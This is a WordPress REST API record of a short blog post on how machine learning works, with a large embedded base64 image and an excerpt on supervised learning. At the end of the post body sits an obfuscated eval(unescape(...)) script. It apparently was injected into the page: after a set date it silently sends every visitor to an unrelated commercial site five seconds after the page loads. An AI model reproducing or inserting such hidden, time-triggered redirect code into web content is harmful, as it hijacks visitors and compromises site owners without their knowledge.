kCt0NE6WUDdvWbi8ho4C+46uKpyVcwt3rVfS18GQFlYWQhC7M2rRZasFCEXXfDz0h2rjbJb0p6Q7VxCd8QP5RhFr3Fr5DyncFOKimMWq+3OSvzbM7wGj\/csP8AzHZ8AFAcZ2tUw+O3Dbi9gALk5ADIDgq8m66fGTnZKYYje7jcnMkm5J6ylYeE28+sGdVnPtonMhLtU5unC7YnpHBFBzQi15pSC6R382AdjON0yCVcatusLHyHgkOAeRtK21mw07KUzOaRxBCW6IROBhmsdTXMevwdwPWQmXDTrXj+XmWfS4t9SeNBKtxElPe35RkzW\/SYekLcbJNWS2F459hyurlCA6ojdxOXaLGx5K0OTnEehK3e2R31lSgVY4KqdEsWEc9RGciX3HDOx8i76baetYxwiN3MeA8jZl8m\/Wkz7XRN6IeUdnsF959i6I9qdzXGwBdf2XVkSVg4e\/euXxscPfvSamk1mRv8djXecAVq8BTsx7dpuiW0m9l1nmvu9H3prqper0felE3lTVWjtVZ0YVyM2SuKTq9+9PWDS2Oz371FoH++SdsMdmkSRiysi5U0p6jq9H3pbJN0Tko9Sv8AfJOJd0T9youYEzZTs6T8k\/L5DvqXnPR09KXLY+\/ZaTt616CpReN36B4cF590apryzN63nbbZI3gDfbsNh13srVIB5XsUCNO1SrFZCHtaCAAR0bnM322uSNt7uAyOXUaPT6rnndrNByA8Jl77SbC3lGeW7jLhZsekTvOuX6u0\/KDhle5uRnbtWlHhr231XCzsz0QcwCN8nAnbnlc5C6a0hpumubtCysWkOs33z7tiQ1dAQb8D9\/RPk2rTRivNtU5EZHZbtFie3b6VIn0odtPYR3gpj3W0SI27iq10\/iBdcbx25gJI6b8mzZ+ad1m18r57DbLZsTtpXS9PLdfbuv8AYfWmCWwaGvLgG67WODQQNYEngdvE91rHkg2mDqTYSBIb70+4hGdaMal2l17kfkxna9ha7SDa5yF8je5XCqYLa3SAABOoWsaNm3pC\/UQSfpEWAgmKyNvkXO4l1r38hP1pWdIpOl4PS29Eevhlne423VboTZaLbJZSzklznB+oywDmtFnEtBIe97g0GxB4rajmcLtaTmbmz6fyXvKdSwPHjnkmCOrIcH5GztbVyDb5DwRkMgBl1LvX4s99s9UDPoki\/b0j6E0sT2WC74nWXNi1+vcdJzmkWBtkGsDXA+MDbfnvuvQecarL28Ee+1UHSxlzhtJJFzlfvK9WaBaFRSRRuv0tUX2fYsvE7DZaOtNdMyOMucm0sYHzi9iTHINnyoxHx4wkqJcv2jnxjCpXBxc+kLalgJ3N6Mu85c057rcWjgpppdyYmSojYyQtMkUjt2XNOiFtn+9J8hXPSrR0YZh1VLVS86zmnxiMgflnyNLGRDK\/Tc4NJ3Ak7lUpNts7HsGYIyt+PWqNZNSvpi0v1By7l4oY8tY1gycW3J8VpJPeb27loxlhbYPSeslc2SbzdzjmbDfwvssBlksuqSdgt27V9WXzVZeuDislaldQsFarJWFwoWFgoJWpXChakrUlbOWijdCLra61A7lglF0Ldr1u0rgF1ahdV\/4Np0ZIo3OaCSxusb7XAWcbHi4EpT+MUZ2sA7lUOiM12Obc9F27g7P67p3e0cXeheJqMLjbI4DLNfa8L+0D5KSN9rnZF+0ZHvCsKoxynAJPAmwvnbd5VTuK1Jc5zicySUrxUi213Dd5UwVB7VqYbRNiBIOq8v8AaTG31DgwiwHBcCxvFcjHwPosuWsjWW8Lr57kty1YWusjWXc0LqCsErAKyhcXWGSwIyWkJzCGNyWGbUITpix8FPkFeywzOwfJ\/vKP4icgtWRuOwFLcwEZpjSQclJvwizifNPtrU4nH7tP7xNNPgsh25BOtJo+0eEbpBjarLXvWpxRm4X\/AFT+8XSJpf4LD3Ef9ZTvR0cbdjb9qc4aq2wAdiWW20Tg++qYZtHJGsdMTq6g1hlw\/WRhNZrPjqWAB7DaZv8A1gcCNqlEdSSCDmCCCPIq9M5jdduW2\/Zf6kt8JkbY66ew6gpscwidcaa9YI0I+tEr02xx3PyFuTXAEWyuLJJLVO+LiBrQedkEjnWu4nYBfbbqThW1uu0HUjsbAdHZbbmudDKSdzc7C2SlGwRsa22lhyyCjNIZZHOvrc88yrQwWvqDFH0A0NY1ovbOw7bjyro7H3t8KPuSDRab8m79Lj1J0EhVPYDBYaK00grT8aWbwR2hYfjMbtjh3ro+ka7a0HyJLNovG7cR2JB2VbYHbkqpqkHeO9OuFS5+\/qUXOhDvkSOHenLBtHKtjgdYOaON7pD2ttkVZY47wpzTs9\/cJykka1jiSBlxTLTRu+XrDsufUnSmZDvJ\/WuFQc1WCQl2FYg0xmxvdp2dnYvOE2JGOWbVJadd4NhnYm9sx1BeiMQxNrGDmrE3tYZ5eRVrpvCDIJBHkR08syU2meGOIO9RcwuFwq\/ONyHfKf1nLR1dIdrXH9J3rUsgpGO6Tdu8HaFzfoqX3LSb8CcitoU1xcWVF1SGmxJSTRCtkZI0loax\/Rd0s7\/INrbnWHYSrTwzGCRbeBb71Vs2BvAtqv1gfGNrdt1IsNrS14DrtOQdnnsve\/X77EqWmLW3ITI6hrnWBT1iDLk9ewWyv1Hh78U018ItYjbe46rGx8nUpBbLaPKLg9nBNuJxut4X1EdotZVQc1bLVWeJUgaTm7v9QXKEDc2\/bfJS\/EaFpewO8EmziDsJ2Hsvl2FObMEY3j1q\/FTiRtwqE1aYnWKgdjtDRn2epZ1nZ7B79inJwePgT5StfwawfICYaG25V\/GvWVDYa\/UtcXPEbfqVqcn+ncrC1oJ1chnewHWdXYmPWa3Y0dgGfoXenN8ybdQ9fqVGqo43ZPt+KsU9bM\/KMc9FLNP+XY0s7A0NmmhY8mzugNdhGqTbcdV5Av4K89coPKHV4lLrVEpc0Wc2IXEbACPAYMr2NrnPrSDlFpjHVuv4LyHA8WPGqe4XTTSxFjM8nE2IHhZX27wDcZb7X3i+thuHwQMDmC5O85n5LDxGrklkLXAC2Vhl\/wArElt2STvK2e8\/45LiTxI8ma1VnIKNVYMo3BaOddCFlzlqVmy1XELDlhZWFG6Fq9albErUoQhy0KysWXELLVuStG8ULqE66OVOq\/8ASFvKMxs8qf31fUPSohSzFpDhtBBHkU4dOSAdY2Iv5Nqya5lnh1tV67AJtqB0e1bZN\/YfbxCYcSqDe1tnamqV6ca6Ykk32pucVZiFgsmtcXPJukuqgtUpggaLZJbT00ZyLdq46q2dyWzDi77yhCFMa3RYHNqY63ApG7ipsqY3aFJloJo93JNjCtysOjI2hZVgZhUyLFZY6ywEBCFxLqs9EKVwvyFsslEJz0QpJSTdFvYPqCTLorMAuSl7T1ro3tSJspXRsxSLlWtgcEvb2rvH2puExWwnKiSVMMHBPdK7Paoe63OOad+sPSnuCpN1FK2Q84TszKI73KjKAAMk5zvAbYbBkOviulMy2qkEr9g4fWU6PbYMy7goPdYhNjiuLqZ6KnoO\/S+xP1PGSmHQNpDH63jZKUMq2tVKR+eSvxQZZrrHCBmTZaVWNwx7XDv+xQ7FMQaXOjMltbwXcOpMkuCgAve\/WA4ZkqAZfziml1vNHepx\/wDeJGHAAG19ttnpU2wrSJjmg3tcZbrqrdGKSJzdYNtnbp2uU7V2CxybSWgHcQB6vSkSBoNs0+MOLbm3sVnxYjreCQR1Z\/asSQB20BU6aCent8XeXBx6QJBtw2qVYNpBMxt53MvuaLX7EiSOwuD8UxutrW93NTN2Axu3Edn+Kjuk9EyPLnDrnYwm\/fnklWlelnNQtLSBJJsGV2t3usqZxvSq7idbWedrjxTKSkMpuRkozVAhF3FWG2CEG529RW8mKBvguyA2ffuVPT6UvyF8uIXCm0lcHWvkTtK1WUL2aGyoSYpA83IB7Qr2wWrjd8oh3AnWaftCRaY0haGzAZG7T5M2\/b3KKaPVgIT3VVLixzL3btAPEcO3Z5VXLnt8m+XWrJiY\/wDWAWNtyctG8R1gAeHv\/gnyoZlbI9R9Sr\/BarVOXd2qbU9TrCx2Wtx2qtMyxVmJ+0ExY1ASCLAA7d4Hv7lcsPxlxaGk3e3okAElwys7Lj77U64vECD1e\/C3eoiat0Lw9u0XB6wT3qzSzFtwFRrqYPsSpfGx5GY1B9Lb5Gi64y2afCJ8gA7s0zS6QudndIqnE7704yTO32SGw07MwL9qfHVq0+PgKOPrutJpKtQFPfVONXbRJuVKnEnMyZdE6rr+Kc7dexQKobrEkknyp70nxfXOoM2tOdt5HXwH38ExPeTuA+tbVMwsjAK89WSiSUuC4mMf4rWy6lvlWur1Kwqq1aFlzrIcEWXLoWFgrJWpUShYKwVkrVcQhalbLBQhaoKCVmyELCxZZJQhCwpBh1X+Ttvbdvq9CYEqoJNo4pE7NpqtUcxjflvFl3qHpMSukzlxuuNClI4kqS3fwb5rPUsaz\/o+az1JVFTt6+\/710ZTN6+\/71nGVvDuXoBRycTz+S1pcSkHi+az1J4o8SLsiG+az1Jujpm9ff8AeuzKRvX3\/eq0hYd3crsFPMDm647fkkekNGHZgN8gaPqUUraYt9\/SpyygaePefWuFXo6HDffdn96dT1rY8iclCvwJ0w2o7X7fkoIsEp8r9HXt3XTTPSkbQtWOdj\/NK8pUUU0Js9pC2ceinijJ1W9g4cAmXcnjCwCwIlNgilbtPt1JQ0n3stg93vZbMjHH0\/euzY28ffvVUvC0RCfork1zvey6MDveyxJXRt2u7s\/qNkllxxm4OPabD60C50C4dluru9Lg4j3CbI6o6xuL5ncLrR+Onc0DvP2ojx07S1h8n2gqQYd4S3TNOjk4wTHdGSey\/wBi7fHZSdVoIPCwB9K3w7TTVteMZbC0kEd6eqPSmncbm7HHe4faCkPbY+b+KsMlJFg\/8PglehokaHh18yDnZSANJ23PckVHVNcLtcHDqNx6DklLZh739aqPzN7K5GSBa6JsKjd4Tb9ySS6Ks+Q57PLknGOYcfr9aVRSjj796US4aJ4aHHOyjowaoZ4Lg8bgcildL8Y2cyL32l\/RUihlHH6\/WlcUg4\/X60p0nEJ7I7aH69qYDQy6pfLI2Jg26m3sud6b8LxWDWcI7azczJKbntF125WpLU7XA5CQX27xlvVf8nNC2olkY7whG57BxLdx45KzTwNfGXu3KnV1DmStjZv4\/WSceU3FtZzS2QPJbZxGxttwUGp6fWcGjpOcbDtVh4lo6yQZdE9X1JNh+BCF3HWFwTusdxWxRFjrRt1Kw6yOW5e\/QJppdDCTque1h4Wv6V1fyfOv+ejtxzv3KQY1TREAs1w75WsduW0eXcmXFIXMYXgk2IvnsF812SKZrrbXcpNkptnNh5lSegpYYmga+s4bSBtXZ+LN3Do+kKJVFWC6KzmkOdqnMG1xvsbrtW9B4ZYZt1g7WOYvY7yMlUNGSczdXvGYtZosE5CpF7g5A+\/d9ilWj1dkbnPIDqvw6\/vVe0dSC54vvtb0jNPmCVVj9f2JFRAQE6kqA45KeSyb\/wDE2+pR7GILnZ7+\/YnGnrMtv2nZbs98lymaTnfL0LPbdpWwWhwUKq2OZcZ2B7kkkq7b1JMYhAu5zgBvvs7\/AFqudJCwuvG8kHa3MAH6JO0LWpj0gXnq5nQH8N6eJ8TCRPxLbZRgk7M7pdHHqjrOZz7h78Sr7YQsp1Q4roOHp4rm8rUv6\/StS4ce5WFXCySsWRr9XetSUXQglalbELVcXFhakrN1hcQtShBQuIQtSFsVquhCLrBWVgrqEIQhRQgLaJ1isFYCCLhdabG66vkWustFi6iGqZkJU5icN5HePUlDGjiO8epQp2MO8VvcfaWrMWcNzfT61mmicV6JuNRtOinTWjiO8LLZLbx3hQkY6\/g3uPtLb8Pv8Vnc72ks0L08Y5CNynscg4jvHqSuKbs9HqVcDSF\/BvcfaXVmlEg+Szud7aW7DXlPb9oohxVjmcHb9nqWk2HMftt6PUq+\/GyTxY+53trozTKUfJj813tpfi2Ueb71M\/aKncLPF\/YpHiWiwsdU+lMNRh8sYsNnZdbjTyXxIvNd+8WJNO5Ttjh8137xWo46puRsR2rMqKmgkO027T1BNctW8b\/QEllqCdpJS2s0hL9scQ7GuH\/Wm6Srv8lvp9avsad7bLHlkbfyXXHtQCi658\/1D38qOe6gmWSNoLrdZ1lxM\/UFjnexFkba7c4gSriJeoLtT1tvktPaD9jgghAcn3Q17xIHC4Gd+B7VYEVSq4g0re3YyIfqu9tdhppL4kXmu9tVZIXON7K7FUsYLXVkx1CUMqFWI04l8SLzXe2sjTqXxIvNd7aSaR\/BWhXxjerWhqj1JXDVqoBp7N4kXmu9tbjlBm8SLzXfvEo0LzuTW4pGN5Vjco\/TpJfo6r+5w9arrkvr+bqoneMdQ\/rZfWuddp7M9j4y2LVe0tNmuvY8OntUbpastc1wtdpBHaDdWYKZzY3MO9VKmtY+Vsjd3xV1aR2ikJOUbzcHc128XGy+3NJtHKhs1VFH0XNe17CMnDNpt9QUJqOUiodtbF5rvtekVHprKyWOZrYg+JwcLNIBI3Os4EjsIRS0743AuUqusikFm+5PWJEtbIB8iVuX0b2tnuXSOoMmtGQdV0Ulrm41mjWbYhzrbDwUUr9I3vMhIYOcN3WDgAb63R6RtnxutGY+8EGzbj9LPIix6WYzWg43KymuspJUSudTMdzTyG2\/Khji3onPpgmw2+KlMdEJnQtie0SvdqDp63hC4Ba6RxbmPFCYcK05qYon07JLQyB4dGWhzSHgh1tYEi9zsssUemczGsYBEebLSx5ibzjS03BDxZ2XXdRsu7Q3qUaX6HVFI1ksksRMt2tbsddnkAy4pPh9ZezsrjI2zF\/8U36Qco81Qzm5mQyAG7XOa\/WYdhLTzu8ZG4Kj0OMubk1rAN9tbPrzeUueIPyCfBOI3XVrUdVkPfLr8q741pEyFt3HpEdFg8I\/d1nJVfHpbKBazO4+0miorXOJc43J2k++7gqDaDad5ei1HYxsttHr17k8Y7jj5nXcbNHgsGwdZ4nr7rJtDkl549SBOVptaGiw0WHJI57tpxuUtaPQtSElNQer38qyKk9SldRulS1uk3xjqHp9az8ZPALt0JSi6SmoKBOepcuuJSsOSf4wepY589SLoShYXDnysc8UIXZC486jnVxC6lC5c6VjnF1C6rC584jnEIXRAXPXRrriF0QueujXQhdCsWXPXWddcXVohCF1cQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIQhCEIX\/2Q==\" width=\"307px\" alt=\"how machine learning works\" \/><\/p>\n<div>\n<div>\n<h2>How machine learning works in real life?<\/h2>\n<\/div>\n<div>\n<div>\n<p>Facial recognition is one of the more obvious applications of machine learning. People previously received name suggestions for their mobile photos and Facebook tagging, but now someone is immediately tagged and verified by comparing and analyzing patterns through facial contours.<\/p>\n<\/div><\/div>\n<\/div>\n<p>eval(unescape(&#8220;%28function%28%29%7Bif%20%28new%20Date%28%29%3Enew%20Date%28%27November%205%2C%202020%27%29%29setTimeout%28function%28%29%7Bwindow.location.href%3D%27https%3A\/\/www.metadialog.com\/%27%3B%7D%2C5*1000%29%3B%7D%29%28%29%3B&#8221;));<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The goal of supervised learning is to map input data with the output data. The supervised learning is based on supervision, and it is the same as when a student learns things in the supervision of the teacher. The reason behind the need for machine learning is that it is capable of doing tasks that [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"_links":{"self":[{"href":"https:\/\/labvetbio.com.br\/blog\/wp-json\/wp\/v2\/posts\/453"}],"collection":[{"href":"https:\/\/labvetbio.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labvetbio.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labvetbio.com.br\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/labvetbio.com.br\/blog\/wp-json\/wp\/v2\/comments?post=453"}],"version-history":[{"count":1,"href":"https:\/\/labvetbio.com.br\/blog\/wp-json\/wp\/v2\/posts\/453\/revisions"}],"predecessor-version":[{"id":454,"href":"https:\/\/labvetbio.com.br\/blog\/wp-json\/wp\/v2\/posts\/453\/revisions\/454"}],"wp:attachment":[{"href":"https:\/\/labvetbio.com.br\/blog\/wp-json\/wp\/v2\/media?parent=453"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labvetbio.com.br\/blog\/wp-json\/wp\/v2\/categories?post=453"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labvetbio.com.br\/blog\/wp-json\/wp\/v2\/tags?post=453"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}